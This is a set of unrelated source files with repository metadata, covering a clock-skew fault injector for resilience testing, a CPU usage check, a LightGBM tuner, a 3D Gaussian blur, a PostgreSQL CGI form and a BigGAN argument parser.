log.info("status of {} is {}".format(fault_id, self.faultinfo.status))
current_time=''
if len(self.status_cmd) != 0:
try:
subprocess.call(self.status_cmd,shell=True)
log.info("Status check succesfull and fault is in progress")
current_time = "time after injection of fault is {}".format(datetime.datetime.now())
except subprocess.CalledProcessError as err:
raise RuntimeError("Checking status failed.\n"
"\tGot exit code {err.returncode}. Msg: {err.output}") from err
return self.faultinfo.status + " ".join(str(x) for x in self.faultinfo.activity) + \
"Before injection: {}".format(self.time_before_injection) + "After Injection: " + current_time
def remediate(self):
log.info("Remediation is triggered")
#kill child processes and terminate process
for p in self.processes:
log.info("Process id : {}".format(p.pid))
parent = psutil.Process(p.pid)
log.info("Number of child Process for {} is".format(parent.name(), len(parent.children(recursive=False))))
for child in parent.children(recursive=True):
child.kill()
p.terminate()
if len(self.remediate_cmd) != 0 :
stop_cmd_return = subprocess.call(self.remediate_cmd,shell=True)
if stop_cmd_return == 0:
log.info("Remediation succesfull : ntp service restored")
self.faultinfo.status = FaultStatus.FaultStatus.COMPLETED.name
else:
self.faultinfo.status = FaultStatus.FaultStatus.REMEDIATION_FAILED.name
def trigger_injection(self):
log.info("Injecting Clock skew")
d = "{}{} days".format(self.option,self.fault_args.get("--days"))
h = "{}{} hours".format(self.option,self.fault_args.get("--hours"))
m = "{}{} minutes".format(self.option, self.fault_args.get("--minutes"))
s = "{}{} seconds".format(self.option, self.fault_args.get("--seconds"))
date_cmd='date -d "{} {} {} {}"'.format(d,h,m,s)
self.time_before_injection = datetime.datetime.now()
log.info("Creating process.")
log.info("Date command : {}".format(date_cmd))
log.info("stop_cmd command :".format(self.stop_cmd))
log.info("remediate_cmd command.".format(self.remediate_cmd))
p1 = Process(target=inject_clock_skew,args=(self.fault_args.get("--timeout"), date_cmd,
self.stop_cmd))
self.processes.append(p1)
p1.start()
def inject_clock_skew(time_out,date_cmd,stop_cmd):
print(stop_cmd)
stop_cmd_return = subprocess.run(stop_cmd,shell=True)
log.info("Date will be changed according to input: {}".format(date_cmd))
log.info("stop_cmd_return code:{}".format(stop_cmd_return))
if stop_cmd_return.returncode == 0:
try:
date_value = subprocess.check_output(date_cmd, shell=True).decode(sys.stdout.encoding).strip()
log.info("Date will be set to: {}".format(str(date_value)))
except subprocess.CalledProcessError as err:
raise RuntimeError("Date creation failed.\n"
"\tGot exit code {err.returncode}. Msg: {err.output}") from err
date_cmd_return = subprocess.run('date -s "{}"'.format(date_value),shell=True )
if date_cmd_return.returncode == 0:
time.sleep(round(float(time_out)/1000))
if __name__ == '__main__':
fault_args = {'--operation': 'inject', '--faultname': "clockSkewFault","--faultId": "abcdefgclock" ,"--timeout":"12000",
"--days": "1", "--hours":"1","--minutes":"1","--seconds":"10", "--type": "FUTURE"}
clockSkewFault= ClockSkewFault(fault_args)
clockSkewFault.trigger_injection()
print("fault triggered")
|
[
"ashrimali@vmware.com"
] |
ashrimali@vmware.com
|
ef229ec59ceb4d8d92a729d7f17f0871bdfee2d2
|
fb1e073983243a9eaa9529569b46d618f71b1187
|
/firstPython.py
|
d0bfe1e2aaf547f26f7701b4f07ec8bcfac7c853
|
[] |
no_license
|
chanderbijlani/test_repo
|
4560f362f50490df9072ae14ecf78d4f7ef4a450
|
9ddfa01a70e4f0d910a24b5d73be1172fbf57f2e
|
refs/heads/master
| 2022-12-08T18:39:10.177625
| 2020-09-18T18:41:54
| 2020-09-18T18:41:54
| 296,657,304
| 0
| 0
| null | 2020-09-18T18:41:55
| 2020-09-18T15:17:19
|
Python
|
UTF-8
|
Python
| false
| false
| 50
|
py
|
## My First python code
print("New Python File")
|
[
"noreply@github.com"
] |
chanderbijlani.noreply@github.com
|
23fe9c349d2bea9ee5b6c6cb3a0e3e09e58d4c6c
|
643a8e5b1cd0b0ec69f3cb4b0f65075f1be17ec8
|
/cpu_usage.py
|
7d22472d8b12c3ea811a87b8b405c98a88641fc6
|
[] |
no_license
|
itsayushisaxena/Python_Utilities
|
01b36d8fc4b8aed765a34f10f16eb1128691c5c7
|
58378157526d900b91759a18cfad8be9d13158c1
|
refs/heads/master
| 2022-06-12T23:07:41.434551
| 2020-05-06T20:05:48
| 2020-05-06T20:05:48
| 261,845,145
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 931
|
py
|
##This code checks whether the CPU is under too much load or not
import psutil
#psutil (python system and process utilities) is a cross-platform
#library for retrieving information on running processes and
#system utilization (CPU, memory, disks, network, sensors) in Python.
def check_cpu_usage(percent):
#cpu_percent() return a float representing the current system-wide
#CPU utilization as a percentage.
usage = psutil.cpu_percent(interval = 1)
print("DEBUG: usage:{}".format(usage))
return usage < percent
if not check_cpu_usage(75):
print("ERROR!CPU is overloaded")
else:
print("Everything ok")
# gives a single float value
print(psutil.cpu_percent())
# gives an object with many fields
print(psutil.virtual_memory()) #physical memory usage
# you can convert that object to a dictionary
print(dict(psutil.virtual_memory()._asdict()))
print('memory % used:', psutil.virtual_memory()[2])
|
[
"noreply@github.com"
] |
itsayushisaxena.noreply@github.com
|
08329b9459b84578dea46f87b58ec8643041c8b8
|
584f7b51d7cd529448e2fc0147557e26931ab17e
|
/test_UsePyFFTW.py
|
5b4eb17729decdd1676234fbf4fc635aba9dee8e
|
[
"BSD-3-Clause"
] |
permissive
|
opticspy/lightpipes
|
8ca0d2221a1b893de5e51fec9061e90b9145f5f8
|
f4ffdedb3ab2f9b5ae5a9a8e37985d2a7f8bb2ef
|
refs/heads/master
| 2023-09-04T19:07:11.376631
| 2023-09-04T15:24:55
| 2023-09-04T15:24:55
| 80,127,706
| 191
| 55
|
BSD-3-Clause
| 2023-08-23T00:45:33
| 2017-01-26T15:39:28
|
Python
|
UTF-8
|
Python
| false
| false
| 460
|
py
|
#! /usr/bin/env python
"""
Script to test the new usePyFFTW option to compare pyFFTW and numpy FFT
"""
import time
from LightPipes import *
start_time = time.time()
wavelength = 500*nm
size = 25*mm
N = 1000
F=Begin(size, wavelength, N)
F=Fresnel(F, 100, usepyFFTW = True)
print(F.field[23,33])
#Fresnel: (1.0795142552372512+0.45098289321969964j)
#Forvard: (0.9865686238070652+0.16334733092228165j)
print("--- %s seconds ---" % (time.time() - start_time))
|
[
"fred511949@gmail.com"
] |
fred511949@gmail.com
|
6267d7aa1c8e47d9c979f168d10dee757731de26
|
6a08edd0e30d12eb89e8de486e2d2d0dddff74d7
|
/run_experiments/general_utils/lightgbm_optimizer.py
|
07f654e8ef7d6c22e4eed79240bb1347e38b469c
|
[] |
no_license
|
jrzaurin/tabulardl-benchmark
|
63b0fa2c046f9900a51b0223a884c475ac66b17f
|
ceb7b7f8bc90666b2d010fe570a77eb3ff2dde78
|
refs/heads/master
| 2023-05-29T11:29:30.371284
| 2021-06-12T16:32:20
| 2021-06-12T16:32:20
| 356,328,779
| 46
| 7
| null | 2021-06-10T16:44:51
| 2021-04-09T16:08:21
|
Python
|
UTF-8
|
Python
| false
| false
| 6,539
|
py
|
import warnings
from typing import Any, Dict, Optional
import lightgbm as lgb
import pandas as pd
from hyperopt import Trials, fmin, hp, space_eval, tpe
from lightgbm import Dataset as lgbDataset
from optuna.integration.lightgbm import LightGBMTunerCV
from sklearn.metrics import log_loss, mean_squared_error
warnings.filterwarnings("ignore")
class LGBOptimizerHyperopt(object):
def __init__(
self,
objective: str = "binary",
is_unbalance: bool = False,
verbose: bool = False,
num_class: Optional[int] = None,
):
self.objective = objective
if objective == "multiclass" and not num_class:
raise ValueError("num_class must be provided for multiclass problems")
self.num_class = num_class
self.is_unbalance = is_unbalance
self.verbose = verbose
self.early_stop_dict: Dict = {}
def optimize(
self,
dtrain: lgbDataset,
deval: lgbDataset,
maxevals: int = 200,
):
if self.objective == "regression":
self.best = lgb.LGBMRegressor().get_params()
else:
self.best = lgb.LGBMClassifier().get_params()
del (self.best["silent"], self.best["importance_type"])
param_space = self.hyperparameter_space()
objective = self.get_objective(dtrain, deval)
objective.i = 0
trials = Trials()
best = fmin(
fn=objective,
space=param_space,
algo=tpe.suggest,
max_evals=maxevals,
trials=trials,
verbose=self.verbose,
)
self.trials = trials
best = space_eval(param_space, trials.argmin)
best["n_estimators"] = int(best["n_estimators"])
best["num_leaves"] = int(best["num_leaves"])
best["min_child_samples"] = int(best["min_child_samples"])
best["verbose"] = -1
best["objective"] = self.objective
self.best.update(best)
def get_objective(self, dtrain: lgbDataset, deval: lgbDataset):
def objective(params: Dict[str, Any]) -> float:
# hyperopt casts as float
params["n_estimators"] = int(params["n_estimators"])
params["num_leaves"] = int(params["num_leaves"])
params["min_child_samples"] = int(params["min_child_samples"])
params["verbose"] = -1
params["seed"] = 1
params["feature_pre_filter"] = False
params["objective"] = self.objective
if self.objective != "regression":
params["is_unbalance"] = self.is_unbalance
if self.objective == "multiclass":
params["num_class"] = self.num_class
model = lgb.train(
params,
dtrain,
valid_sets=[deval],
early_stopping_rounds=50,
verbose_eval=False,
)
preds = model.predict(deval.data)
if self.objective != "regression":
score = log_loss(deval.label, preds)
elif self.objective == "regression":
score = mean_squared_error(deval.label, preds)
objective.i += 1 # type: ignore
return score
return objective
def hyperparameter_space(
self, param_space: Dict[str, Any] = None
) -> Dict[str, Any]:
space = {
"learning_rate": hp.uniform("learning_rate", 0.01, 0.3),
"n_estimators": hp.quniform("n_estimators", 100, 1000, 50),
"num_leaves": hp.quniform("num_leaves", 20, 200, 10),
"min_child_samples": hp.quniform("min_child_samples", 20, 100, 20),
"colsample_bytree": hp.uniform("colsample_bytree", 0.5, 1.0),
"reg_alpha": hp.choice(
"reg_alpha", [0.01, 0.05, 0.1, 0.2, 0.4, 1.0, 2.0, 4.0, 10.0]
),
"reg_lambda": hp.choice(
"reg_lambda", [0.01, 0.05, 0.1, 0.2, 0.4, 1.0, 2.0, 4.0, 10.0]
),
}
if param_space:
return param_space
else:
return space
class LGBOptimizerOptuna(object):
def __init__(
self,
objective: str = "binary",
is_unbalance: bool = False,
verbose: bool = False,
num_class: Optional[int] = None,
):
self.objective = objective
if objective == "multiclass" and not num_class:
raise ValueError("num_class must be provided for multiclass problems")
self.num_class = num_class
self.is_unbalance = is_unbalance
self.verbose = verbose
self.best: Dict[str, Any] = {} # Best hyper-parameters
def optimize(self, dtrain: lgbDataset, deval: lgbDataset):
# Define the base parameters
if self.objective == "binary":
params: Dict = {"objective": self.objective}
elif self.objective == "multiclass":
params: Dict = {"objective": self.objective, "metric": "multi_logloss"}
elif self.objective == "regression":
params: Dict = {"objective": self.objective, "metric": "rmse"}
if self.verbose:
params["verbosity"] = 1
else:
params["verbosity"] = -1
if self.objective != "regression":
params["is_unbalance"] = self.is_unbalance
if self.objective == "multiclass":
params["num_class"] = self.num_class
# Reformat the data for LightGBM cross validation method
train_set = lgb.Dataset(
data=pd.concat([dtrain.data, deval.data]).reset_index(drop=True),
label=pd.concat([dtrain.label, deval.label]).reset_index(drop=True),
categorical_feature=dtrain.categorical_feature,
free_raw_data=False,
)
train_index = range(len(dtrain.data))
valid_index = range(len(dtrain.data), len(train_set.data))
# Run the hyper-parameter tuning
self.tuner = LightGBMTunerCV(
params=params,
train_set=train_set,
folds=[(train_index, valid_index)],
verbose_eval=False,
num_boost_round=1000,
early_stopping_rounds=50,
)
self.tuner.run()
self.best = self.tuner.best_params
# since n_estimators is not among the params that Optuna optimizes we
# need to add it manually. We add a high value since it will be used
# with early_stopping_rounds
self.best["n_estimators"] = 1000 # type: ignore
|
[
"jrzaurin@gmail.com"
] |
jrzaurin@gmail.com
|
f4353e767fb70115d18ba97653112056174e70a5
|
6fecdc9fae6f7a7b89fa6101cc914557b929fcbe
|
/Part2/gaussian_blur3d_starter.py
|
ad2c3734ea1bfa0bb8c43a087d3325bbb8181e36
|
[] |
no_license
|
zzhang115/CodeChallenge
|
bee60e666f5ed17a7a0372f7d44a479b5f460b0d
|
a6ca04095771f5fa0299a0e0169d8ed83e486f55
|
refs/heads/master
| 2020-03-17T02:31:07.025144
| 2018-05-14T08:45:46
| 2018-05-14T08:45:46
| 133,193,314
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,026
|
py
|
import numpy as np
import h5py
volume = []
meta_data = {}
config = {"sigma" : 5}
input_3d = None
blurred_img = None
# load 3d volume from hdf5 file and stored in input_3d
def load_3dvolume(volume_path):
global input_3d
hdf5_file = h5py.File(volume_path, "r")
pixel_data_grp = hdf5_file["pixel_data"]
inverse_convert_pixelscale = np.iinfo(np.int16).max
for pixel_data_index in pixel_data_grp:
pixel_array = pixel_data_grp[pixel_data_index][()]
volume.append(pixel_array)
pixel_spacing_grp = hdf5_file["pixel_spacing"]
meta_data["pixel_spacing_x"] = pixel_spacing_grp["pixel_spacing_x"].value
meta_data["pixel_spacing_y"] = pixel_spacing_grp["pixel_spacing_y"].value
meta_data["pixel_spacing_z"] = pixel_spacing_grp["pixel_spacing_z"].value
hdf5_file.close()
input_3d = np.asarray(volume)
return input_3d, meta_data, config
# gaussian blured algorithm is to calculate the value of the blur point according to its neighbor pixels
# as the formula from https://en.wikipedia.org/wiki/Gaussian_blur, I made a "mask" to set its distance
# with neighbor pixels, and then mulitple the normal distribution possiblity.
def gaussian(x_space, y_space, z_space, sigma):
gaussian = np.zeros((2 * x_space + 1, 2 * y_space + 1, 2 * z_space + 1))
row = 0
for x in range(-x_space, x_space + 1):
col = 0
for y in range(-y_space, y_space + 1):
lay = 0
for z in range(-z_space, z_space + 1):
d1 = np.power(sigma, 3) * np.power(2 * np.pi, 3 / 2)
d2 = np.exp(-(x ** 2 + y ** 2 + z ** 2) / (2 * sigma ** 2))
gaussian[row][col][lay] = (1 / d1) * d2
lay = lay + 1
col = col + 1
row = row + 1
return gaussian
# I spent too much time on figuring the gaussian algorithm and how to extend from 2d blurrd image to 3d volume,
# this function use the mask we generate from func:gaussian to multiple with the input_3d, finally we got
# the blurred image.
def caculate_blurred_img(img, mask):
row, col, lay = img.shape
m, n, o = mask.shape
new = np.zeros((row + m - 1, col + n - 1, lay + o -1))
n = n // 2
m = m // 2
o = o // 2
blurred_img = np.zeros(img.shape)
new[m:new.shape[0] - m, n:new.shape[1] - n, o:new.shape[2] - o] = img
for i in range(m, new.shape[0] - m):
for j in range(n, new.shape[1] - n):
for k in range(o, new.shape[2] - o):
temp = new[i - m:i + m + 1, j - n:j + n + 1, k - o:k + o + 1]
result = temp * mask
blurred_img[i - m, j - n, k - o] = result.sum()
return blurred_img
# the pixel spacing from different dimension I think we should discuss how to involve the calculation
# this is my personl idea and use fixed space to calcaute the blurred image
def gaussian_blur3d(input_3d: np.ndarray, meta_data: dict, config: dict) -> np.array:
# Performs 3D Gaussian blur on the input volume
mask = gaussian(10, 10, 10, config["sigma"])
blurred_img = caculate_blurred_img(input_3d, mask)
return blurred_img
# pre_gaussian_blur3d and post_gaussian_blur3d used for InterferencePipline test
def pre_gaussian_blur3d(input_volume_path):
global input_3d, meta_data, config
input_3d, meta_data, config = load_3dvolume(input_volume_path)
def run_gaussian_blur3d():
global blurred_img, input_3d, meta_data, config
blurred_img = gaussian_blur3d(input_3d, meta_data, config)
def post_gaussian_blur3d(output_volume_path):
# write blurred image to hdf5 file
hdf5_file = h5py.File(output_volume_path + "blurred_img.hdf5", "w")
pixel_data_grp = hdf5_file.create_group("pixel_data")
for i in range(len(blurred_img)):
pixel_data_grp.create_dataset("pixel_data" + str(i), dtype='f4', data=blurred_img[i])
hdf5_file.close()
if __name__ == "__main__":
pre_gaussian_blur3d("../hdf5_data/hdf5_data.hdf5")
run_gaussian_blur3d()
post_gaussian_blur3d("./")
|
[
"zzhang115@dons.usfca.edu"
] |
zzhang115@dons.usfca.edu
|
a97f9739f04df3ba4810633235975d3143dfb466
|
cad460552d69a075c6dc3595949dffdb251704a3
|
/proj3/web/tr_insform.cgi
|
c9a463ad2001708566b2f52170612066f5d61222
|
[] |
no_license
|
andretavluis/Databases
|
6d5c4779e173b58f39ad7fd12fde2a5943687ad4
|
c29d06d1485994fd5f9329408b378b69b5f231f7
|
refs/heads/main
| 2023-04-27T22:13:14.039316
| 2021-05-18T16:53:24
| 2021-05-18T16:53:24
| 368,599,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,954
|
cgi
|
#!/usr/bin/python3
import psycopg2
import login
import cgi
form = cgi.FieldStorage()
print('Content-type:text/html\n\n')
print('<html>')
print('<head>')
print('<title>Proj 3</title>')
print('</head>')
print('<body>')
# The string has the {}, the variables inside format() will replace the {}
print('<h3>Insert New Transformer Data</h3>')
# The form will send the info needed for the SQL query
print('<form action="tr_insert.cgi" method="post">')
print('<p>Transformer ID: <input type="text" name="id"/></p>')
print('<p>Primary busbar ID: <input type="text" name="pbbid"/></p>')
print('<p>Primary Voltage: <input type="number" name="pv"/></p>')
print('<p>Secondary busbar ID: <input type="text" name="sbbid"/></p>')
print('<p>Secondary Voltage: <input type="number" name="sv"/></p>')
print('<p>GPS Latitude: <input type="number" name="gpslat" step="0.000001"/></p>')
print('<p>GPS Longitude: <input type="number" name="gpslong" step="0.000001"/></p>')
print('<p><input type="submit" value="Submit"/></p>')
print('</form>')
connection = None
try:
connection = psycopg2.connect(login.credentials)
cursor = connection.cursor()
# Displaying substations
sql = 'SELECT * FROM substation;'
cursor.execute(sql)
result = cursor.fetchall()
print('<h3>Available Substations</h3>')
print('<table border="5">')
print('<tr><td>gpslat</td><td>gpslong</td><td>locality</td></tr>')
for row in result:
print('<tr>')
for value in range(len(row)-2):
print('<td>{}</td>'.format(row[value]))
print('</tr>')
print('</table>')
# Displaying busbars
sql = 'SELECT * FROM busbar;'
cursor.execute(sql)
result = cursor.fetchall()
print('<h3>Available Busbars</h3>')
print('<table border="5">')
print('<tr><td>ID</td><td>voltage</td></tr>')
for row in result:
print('<tr>')
for value in row:
print('<td>{}</td>'.format(value))
print('</tr>')
print('</table>')
# Displaying transfomers
sql = 'SELECT * FROM transformer;'
cursor.execute(sql)
result = cursor.fetchall()
print('<h3>Already Existing Transformers</h3>')
print('<table border="5">')
print('<tr><td>ID</td><td>pv</td><td>sv</td><td>gpslat</td><td>gpslong</td><td>pbbid</td><td>sbbid</td></tr>')
for row in result:
print('<tr>')
for value in row:
print('<td>{}</td>'.format(value))
print('</tr>')
print('</table>')
#Closing connection
cursor.close()
except Exception as e:
print('<h1>An error occurred.</h1>')
print('<form action="page.cgi" method="get">')
print('<p><input type="submit" value="Return"/></p>')
print('</form>')
finally:
if connection is not None:
connection.close()
print('<form action="page.cgi" method="get">')
print('<p><input type="submit" value="Return"/></p>')
print('</form>')
print('</body>')
print('</html>')
|
[
"noreply@github.com"
] |
andretavluis.noreply@github.com
|
d543afbd88b02247daaffc3464471ccbfa5b366a
|
03969015ab882f4751dc0e91beeda1212babca48
|
/robot_code/Nimbus_ws/build/robotiq_85_gripper_actions/catkin_generated/pkg.develspace.context.pc.py
|
5deddba43de547be76a27e50e515649c31ddd7ff
|
[] |
no_license
|
lnairGT/Thesis_code
|
f3ad57f4344691227dcd128a741eb9c0e937738e
|
6f5dbfc2510272f294a0e9bb4273beceeacbff2a
|
refs/heads/master
| 2023-03-17T21:43:56.320553
| 2020-09-26T16:05:31
| 2020-09-26T16:05:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 388
|
py
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "robotiq_85_gripper_actions"
PROJECT_SPACE_DIR = "/home/lnair3/Nimbus_ws/devel"
PROJECT_VERSION = "0.0.1"
|
[
"lnair3@gatech.edu"
] |
lnair3@gatech.edu
|
7d08f5615033845920551fbd2d3e302e74b1b049
|
0db410b97489d2ede4b612a840b8f3cf529a8e16
|
/__init__.py
|
09ad418de8d45f030c6cddfaca804bae8906260c
|
[
"MIT"
] |
permissive
|
Desaiakshata/CovidTracker
|
a7cb98831662ff044bf7b7e331e9d282aeab212e
|
5609b67b7c48abf308e12e8d29cb7cf49cb24866
|
refs/heads/main
| 2023-06-26T20:27:12.082643
| 2021-08-04T11:18:43
| 2021-08-04T11:18:43
| 392,657,086
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 80
|
py
|
from flask import Flask
app = Flask(__name__)
from program import routes
|
[
"noreply@github.com"
] |
Desaiakshata.noreply@github.com
|
3055fa47d34910711fc7807295779602a0cc3cce
|
47fcf268ac089915e5983ff028ea58966eb75605
|
/envs_repo/inception_pytorch/utils.py
|
4711897a2f409977f277e583a139096e978a21a8
|
[] |
no_license
|
goldenair/CE-GAN
|
8e47bc09de3d0312d4b5528f35e0bbe6737218cd
|
ad8b1946fbf9c76eca7a3480bbb61d9f3121e224
|
refs/heads/master
| 2023-02-10T13:01:20.826060
| 2021-01-10T07:39:40
| 2021-01-10T07:39:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 52,120
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Utilities file
This file contains utility functions for bookkeeping, logging, and data loading.
Methods which directly affect training should either go in layers, the model,
or train_fns.py.
"""
from __future__ import print_function
import sys
import os
import numpy as np
import time
import datetime
import json
import pickle
from argparse import ArgumentParser
# import animal_hash
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
import torchvision.transforms as transforms
from torch.utils.data import DataLoader
import datasets as dset
def prepare_parser():
usage = 'Parser for all scripts.'
parser = ArgumentParser(description=usage)
### Dataset/Dataloader stuff ###
parser.add_argument(
'--dataset', type=str, default='I128_hdf5',
help='Which Dataset to train on, out of I128, I256, C10, C100;'
'Append "_hdf5" to use the hdf5 version for ISLVRC '
'(default: %(default)s)')
parser.add_argument(
'--augment', action='store_true', default=False,
help='Augment with random crops and flips (default: %(default)s)')
parser.add_argument(
'--num_workers', type=int, default=8,
help='Number of dataloader workers; consider using less for HDF5 '
'(default: %(default)s)')
parser.add_argument(
'--no_pin_memory', action='store_false', dest='pin_memory', default=True,
help='Pin data into memory through dataloader? (default: %(default)s)')
parser.add_argument(
'--shuffle', action='store_true', default=False,
help='Shuffle the data (strongly recommended)? (default: %(default)s)')
parser.add_argument(
'--load_in_mem', action='store_true', default=False,
help='Load all data into memory? (default: %(default)s)')
parser.add_argument(
'--use_multiepoch_sampler', action='store_true', default=False,
help='Use the multi-epoch sampler for dataloader? (default: %(default)s)')
### Model stuff ###
parser.add_argument(
'--model', type=str, default='BigGAN',
help='Name of the model module (default: %(default)s)')
parser.add_argument(
'--G_param', type=str, default='SN',
help='Parameterization style to use for G, spectral norm (SN) or SVD (SVD)'
' or None (default: %(default)s)')
parser.add_argument(
'--D_param', type=str, default='SN',
help='Parameterization style to use for D, spectral norm (SN) or SVD (SVD)'
' or None (default: %(default)s)')
parser.add_argument(
'--G_ch', type=int, default=64,
help='Channel multiplier for G (default: %(default)s)')
parser.add_argument(
'--D_ch', type=int, default=64,
help='Channel multiplier for D (default: %(default)s)')
parser.add_argument(
'--G_depth', type=int, default=1,
help='Number of resblocks per stage in G? (default: %(default)s)')
parser.add_argument(
'--D_depth', type=int, default=1,
help='Number of resblocks per stage in D? (default: %(default)s)')
parser.add_argument(
'--D_thin', action='store_false', dest='D_wide', default=True,
help='Use the SN-GAN channel pattern for D? (default: %(default)s)')
parser.add_argument(
'--G_shared', action='store_true', default=False,
help='Use shared embeddings in G? (default: %(default)s)')
parser.add_argument(
'--shared_dim', type=int, default=0,
help='G''s shared embedding dimensionality; if 0, will be equal to dim_z. '
'(default: %(default)s)')
parser.add_argument(
'--dim_z', type=int, default=128,
help='Noise dimensionality: %(default)s)')
parser.add_argument(
'--z_var', type=float, default=1.0,
help='Noise variance: %(default)s)')
parser.add_argument(
'--hier', action='store_true', default=False,
help='Use hierarchical z in G? (default: %(default)s)')
parser.add_argument(
'--cross_replica', action='store_true', default=False,
help='Cross_replica batchnorm in G?(default: %(default)s)')
parser.add_argument(
'--mybn', action='store_true', default=False,
help='Use my batchnorm (which supports standing stats?) %(default)s)')
parser.add_argument(
'--G_nl', type=str, default='relu',
help='Activation function for G (default: %(default)s)')
parser.add_argument(
'--D_nl', type=str, default='relu',
help='Activation function for D (default: %(default)s)')
parser.add_argument(
'--G_attn', type=str, default='64',
help='What resolutions to use attention on for G (underscore separated) '
'(default: %(default)s)')
parser.add_argument(
'--D_attn', type=str, default='64',
help='What resolutions to use attention on for D (underscore separated) '
'(default: %(default)s)')
parser.add_argument(
'--norm_style', type=str, default='bn',
help='Normalizer style for G, one of bn [batchnorm], in [instancenorm], '
'ln [layernorm], gn [groupnorm] (default: %(default)s)')
### Model init stuff ###
parser.add_argument(
'--seed', type=int, default=0,
help='Random seed to use; affects both initialization and '
' dataloading. (default: %(default)s)')
parser.add_argument(
'--G_init', type=str, default='ortho',
help='Init style to use for G (default: %(default)s)')
parser.add_argument(
'--D_init', type=str, default='ortho',
help='Init style to use for D(default: %(default)s)')
parser.add_argument(
'--skip_init', action='store_true', default=False,
help='Skip initialization, ideal for testing when ortho init was used '
'(default: %(default)s)')
### Optimizer stuff ###
parser.add_argument(
'--G_lr', type=float, default=5e-5,
help='Learning rate to use for Generator (default: %(default)s)')
parser.add_argument(
'--D_lr', type=float, default=2e-4,
help='Learning rate to use for Discriminator (default: %(default)s)')
parser.add_argument(
'--G_B1', type=float, default=0.0,
help='Beta1 to use for Generator (default: %(default)s)')
parser.add_argument(
'--D_B1', type=float, default=0.0,
help='Beta1 to use for Discriminator (default: %(default)s)')
parser.add_argument(
'--G_B2', type=float, default=0.999,
help='Beta2 to use for Generator (default: %(default)s)')
parser.add_argument(
'--D_B2', type=float, default=0.999,
help='Beta2 to use for Discriminator (default: %(default)s)')
### Batch size, parallel, and precision stuff ###
parser.add_argument(
'--batch_size', type=int, default=64,
help='Default overall batchsize (default: %(default)s)')
parser.add_argument(
'--G_batch_size', type=int, default=0,
help='Batch size to use for G; if 0, same as D (default: %(default)s)')
parser.add_argument(
'--num_G_accumulations', type=int, default=1,
help='Number of passes to accumulate G''s gradients over '
'(default: %(default)s)')
parser.add_argument(
'--num_D_steps', type=int, default=2,
help='Number of D steps per G step (default: %(default)s)')
parser.add_argument(
'--num_D_accumulations', type=int, default=1,
help='Number of passes to accumulate D''s gradients over '
'(default: %(default)s)')
parser.add_argument(
'--split_D', action='store_true', default=False,
help='Run D twice rather than concatenating inputs? (default: %(default)s)')
parser.add_argument(
'--num_epochs', type=int, default=100,
help='Number of epochs to train for (default: %(default)s)')
parser.add_argument(
'--parallel', action='store_true', default=False,
help='Train with multiple GPUs (default: %(default)s)')
parser.add_argument(
'--G_fp16', action='store_true', default=False,
help='Train with half-precision in G? (default: %(default)s)')
parser.add_argument(
'--D_fp16', action='store_true', default=False,
help='Train with half-precision in D? (default: %(default)s)')
parser.add_argument(
'--D_mixed_precision', action='store_true', default=False,
help='Train with half-precision activations but fp32 params in D? '
'(default: %(default)s)')
parser.add_argument(
'--G_mixed_precision', action='store_true', default=False,
help='Train with half-precision activations but fp32 params in G? '
'(default: %(default)s)')
parser.add_argument(
'--accumulate_stats', action='store_true', default=False,
help='Accumulate "standing" batchnorm stats? (default: %(default)s)')
parser.add_argument(
'--num_standing_accumulations', type=int, default=16,
help='Number of forward passes to use in accumulating standing stats? '
'(default: %(default)s)')
### Bookkeping stuff ###
parser.add_argument(
'--G_eval_mode', action='store_true', default=False,
help='Run G in eval mode (running/standing stats?) at sample/test time? '
'(default: %(default)s)')
parser.add_argument(
'--save_every', type=int, default=2000,
help='Save every X iterations (default: %(default)s)')
parser.add_argument(
'--num_save_copies', type=int, default=2,
help='How many copies to save (default: %(default)s)')
parser.add_argument(
'--num_best_copies', type=int, default=2,
help='How many previous best checkpoints to save (default: %(default)s)')
parser.add_argument(
'--which_best', type=str, default='IS',
help='Which metric to use to determine when to save new "best"'
'checkpoints, one of IS or FID (default: %(default)s)')
parser.add_argument(
'--no_fid', action='store_true', default=False,
help='Calculate IS only, not FID? (default: %(default)s)')
parser.add_argument(
'--test_every', type=int, default=5000,
help='Test every X iterations (default: %(default)s)')
parser.add_argument(
'--num_inception_images', type=int, default=50000,
help='Number of samples to compute inception metrics with '
'(default: %(default)s)')
parser.add_argument(
'--hashname', action='store_true', default=False,
help='Use a hash of the experiment name instead of the full config '
'(default: %(default)s)')
parser.add_argument(
'--base_root', type=str, default='',
help='Default location to store all weights, samples, data, and logs '
' (default: %(default)s)')
parser.add_argument(
'--data_root', type=str, default='data',
help='Default location where data is stored (default: %(default)s)')
parser.add_argument(
'--weights_root', type=str, default='weights',
help='Default location to store weights (default: %(default)s)')
parser.add_argument(
'--logs_root', type=str, default='logs',
help='Default location to store logs (default: %(default)s)')
parser.add_argument(
'--samples_root', type=str, default='samples',
help='Default location to store samples (default: %(default)s)')
parser.add_argument(
'--pbar', type=str, default='mine',
help='Type of progressbar to use; one of "mine" or "tqdm" '
'(default: %(default)s)')
parser.add_argument(
'--name_suffix', type=str, default='',
help='Suffix for experiment name for loading weights for sampling '
'(consider "best0") (default: %(default)s)')
parser.add_argument(
'--experiment_name', type=str, default='',
help='Optionally override the automatic experiment naming with this arg. '
'(default: %(default)s)')
parser.add_argument(
'--config_from_name', action='store_true', default=False,
help='Use a hash of the experiment name instead of the full config '
'(default: %(default)s)')
### EMA Stuff ###
parser.add_argument(
'--ema', action='store_true', default=False,
help='Keep an ema of G''s weights? (default: %(default)s)')
parser.add_argument(
'--ema_decay', type=float, default=0.9999,
help='EMA decay rate (default: %(default)s)')
parser.add_argument(
'--use_ema', action='store_true', default=False,
help='Use the EMA parameters of G for evaluation? (default: %(default)s)')
parser.add_argument(
